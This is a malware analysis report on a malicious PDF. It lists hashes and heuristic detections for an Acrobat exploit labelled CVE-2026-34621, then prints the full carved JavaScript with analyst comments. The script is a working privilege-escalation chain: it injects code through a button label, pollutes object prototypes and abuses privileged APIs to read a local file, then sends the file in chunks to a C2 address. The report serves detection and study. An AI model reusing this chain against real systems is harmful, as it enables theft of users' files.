Malicious PDF — malware analysis report

Static analysis result for SHA-256 e6039f6e0005cdc4…

MALICIOUS

PDF

3.5 KB First seen: 2026-06-25
MD5: 97d52c756a6ccc882cbb0fe1662bcce8 SHA-1: 3191239cdd31e8d1d5dcceae9c4aec9ce451d756 SHA-256: e6039f6e0005cdc4a1fbf41866628b5b74f410b5b16abc5e28bc92e598e238f2
258 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9998

Heuristics 6

  • Adobe Acrobat/Reader privileged API chain — CVE-2026-34621 critical CVE exact CVE_2026_34621
    PDF JavaScript matches the CVE-2026-34621 exploit chain: Acrobat internal UI/share APIs, swConn prototype/getter manipulation, and privileged RSS or file-read APIs used for staged command-and-control.
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Prototype-pollution JavaScript pattern high CVE related PDF_JS_PROTOTYPE_POLLUTION
    PDF JavaScript mutates object prototypes while also referencing privileged or sensitive PDF APIs. This tracks a modern PDF exploit technique family without assigning an unverified CVE.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
                ANShareFile({ 'doc': eval('this') });
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0003_000.js | pdf-javascript-stream | PDF /JS object 3 at offset 0xA9 | 2811 bytes
SHA-256: 47d9c83d9a81921db21c6a6d084b1a10a230b203ab5ebc8abe1643d763d8993c
Detection
ClamAV: No threats found (signature-based scan only; a miss here does not contradict the heuristic and ML verdicts above — the script is bespoke exploit code, not a known family)
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). The single token is the `eval('this')` in the ANShareFile call; it evaluates to `this` and decodes nothing, and the remainder of the script is unobfuscated plaintext, so the "obfuscation" signal here is weak.
Preview script
First 1,000 lines of the extracted script
// Exfiltration payload (stage 3 of the chain). Stored on `global` under the
// name `stealfile` so that global.B (below) can hand it to app.trustedFunction,
// and then call it once elevated. On its own this function cannot succeed:
// app.beginPriv() is presumably rejected for a non-trusted function and would
// land in the catch below — TODO confirm against the Acrobat JS API reference.
global.stealfile = function readFileAndExfiltrate() {
    try {
        // Privileged section: read an arbitrary local path from document
        // JavaScript. The fixed target is the Windows hosts file — an innocuous
        // choice consistent with a proof-of-concept; any path could be substituted.
        app.beginPriv();
        var stream = util.readFileIntoStream("/C/Windows/System32/drivers/etc/hosts", false);
        app.endPriv();

        if (!stream) {
//            app.alert("Stream is null");
            return false;
        }

        // Reads up to 5 MiB (5242880) in one call. The author's own comment says
        // the stream contents come back hex-encoded, so each 1000-character
        // chunk below carries 500 bytes of the file.
        var hexData = stream.read(5242880); // This is ALREADY hex data!
        if (!hexData || hexData.length === 0) {
            app.alert("No data read");
            return false;
        }

    //    app.alert("Hex length: " + hexData.length);
      //  app.alert("First 50 chars: " + hexData.substring(0, 50));

        // SEND HEX DATA DIRECTLY - Split into chunks
        // Exfil endpoint. 192.168.56.1 is an RFC 1918 private address (the
        // 192.168.56.x range is commonly a VirtualBox host-only network), which
        // points to a lab/test build rather than a live campaign — treat host:port
        // as a weak IOC at best.
        var C2_HOST = "192.168.56.1";
        var C2_PORT = "45191";
        var chunkSize = 1000;
        var totalChunks = Math.ceil(hexData.length / chunkSize);
        
  //      app.alert("Sending " + totalChunks + " chunks...");
        
        for (var i = 0; i < hexData.length; i += chunkSize) {
            var chunk = hexData.substring(i, i + chunkSize);
            var chunkNum = (i / chunkSize) + 1;
            
            // The file content travels in the query string of a plain-HTTP GET.
            // `file=file` is a hard-coded literal, not the path; `size`, `chunk`
            // and `total` let the receiver reassemble the hex payload in order.
            var url = "http://" + C2_HOST + ":" + C2_PORT + "/exfil?file=file&size=" +
                      hexData.length + "&chunk=" + chunkNum + "&total=" + totalChunks +
                      "&data=" + encodeURIComponent(chunk);
            
            // launchURL opens the URL in the user's browser (the second argument is
            // the new-window flag per the public API — TODO confirm). This makes
            // the exfil noisy: one browser navigation per 500-byte chunk, with the
            // full hex payload left in browser history, proxy logs and the
            // receiving server's access log — all useful detection/forensic sources.
            app.launchURL(url, false);
        }
        
        //app.alert("All " + totalChunks + " chunks sent to C2!");
        return true;

    } catch(e) {
        // Any failure, including a rejected beginPriv(), is surfaced to the
        // user as an alert rather than hidden — again more PoC than production.
        app.alert("Error: " + e);
        return false;
    }
};

// Stage 1 of the privilege-escalation chain. global.A is only a factory: its
// sole effect is to define global.B. It is reached indirectly — `global.A()`
// appears inside the injected `buttons` label passed to ANFancyAlertImpl
// further down — which is presumably how the sample gets a function defined
// from within Acrobat's internal (privileged) UI context. — TODO confirm
global.A = () => {
   
    // global.B(functionRef): get app.trustedFunction(functionRef) called from
    // privileged internal code, so that `functionRef` may later use
    // app.beginPriv() itself. Each hop below is a plain object whose method slot
    // is a *bound* privileged API, so when internal code calls e.g. `x.read()`
    // it actually invokes the API the attacker chose. NOTE(review): `this` is
    // the call-time receiver of global.B; the sample relies on it being the
    // document object when invoked from document-level script — TODO confirm.
    global.B = function(functionRef) {
        try {
           
            // Hop 3: a stream-like object whose read() is
            // app.trustedFunction(functionRef). `stream`, `ob`, `data` and
            // `fakeobj` are all implicit globals (no var/let) — itself a
            // noteworthy artifact for detection of this sample.
            stream = {
                'read': app.trustedFunction.bind(app, functionRef)
            };

           
            // Hop 2: an object whose getFullName() calls
            // SOAP.stringFromStream(stream), which is what drives stream.read().
            ob = {
                'getFullName': SOAP.stringFromStream.bind(SOAP, stream)
            };

        
            // Prototype pollution: every object now resolves `swConn` to `ob`,
            // so any internal code that reads `<anything>.swConn.getFullName()`
            // lands on hop 2. The top-level `delete Object.prototype.swConn`
            // runs BEFORE global.B is invoked, so this getter is actually left
            // in place after the chain completes.
            Object.prototype.__defineGetter__('swConn', () => { return ob; });

           
            // Arguments pre-bound for SilentDocCenterLogin below; clearing
            // `dirty` on the document presumably avoids a save prompt from the
            // share path — TODO confirm.
            data = { 'WT': '' };
            this.dirty = false;

            
            // Hop 1: a string-impersonating object. ANShareFile is expected to
            // treat doc.path as a string and call lastIndexOf() on it; that call
            // is redirected to SilentDocCenterLogin(data, {}) (which presumably
            // reaches swConn.getFullName()), and the throwing substring() aborts
            // the rest of the internal routine once the trusted-function call has
            // already happened — the order of those internal calls is inferred.
            fakeobj = {
                'lastIndexOf': SilentDocCenterLogin.bind(app, data, {}),
                'substring': () => { throw Error(''); }
            };

           
            // Override `path` on the document (`this`) so the fake object is
            // returned in place of the real file path string.
            this.__defineGetter__('path', () => { return fakeobj; });

            
            // Kick off the chain by handing the booby-trapped document to the
            // internal share API. eval('this') is simply `this`; this eval is the
            // only "obfuscation" token the static triage flagged.
            ANShareFile({ 'doc': eval('this') });

        } catch (e) {
            // Errors are expected here (see the throwing substring() above) and
            // are deliberately swallowed so the document keeps executing.
        }
    };
};


// Injection payload for ANFancyAlertImpl. The button label is shaped so that,
// if the implementation splices labels into JavaScript source text and
// evaluates it, the label closes the enclosing string literal, call and block
// (`a(a(a'); });`), runs `global.A();`, then throws to abort whatever source
// follows, with `//` commenting out the remainder. That ANFancyAlertImpl
// evaluates labels this way is inferred from the string's shape, not shown
// here — TODO confirm. The value 0 is irrelevant; only the key matters.
buttons = {
    "a(a(a'); }); global.A(); throw Error('oops'); //": 0
};


// Trigger the injection. ANFancyAlertImpl is an internal Acrobat alert routine
// (not part of the public document JS API; presumably reachable from document
// script because of the vulnerability this sample targets). The empty/zero
// arguments are placeholders — the only argument that matters is `buttons`.
// The `throw Error('oops')` planted in the label propagates out of this call
// and is swallowed here; after this statement global.A has run and global.B
// is defined.
try {
    ANFancyAlertImpl('', [], 0, buttons, 0, 0, 0, 0, 0);
} catch (e) {
    
}

// Intended cleanup of the polluted prototype getter. As written it runs BEFORE
// the getter is installed — `Object.prototype.__defineGetter__('swConn', …)`
// lives inside global.B, which is only called two statements below — so on a
// first execution this deletes nothing and Object.prototype.swConn remains
// polluted after the chain finishes. Likely an ordering slip in the sample;
// the lingering getter is a useful runtime indicator for this technique.
delete Object.prototype.swConn;


// Stage 2 + 3: run the escalation chain with the exfil function as the target,
// then call it. After global.B returns, stealfile is expected to be a trusted
// function, so its app.beginPriv() succeeds and the read + HTTP exfil proceed.
global.B(global.stealfile);                   
global.stealfile();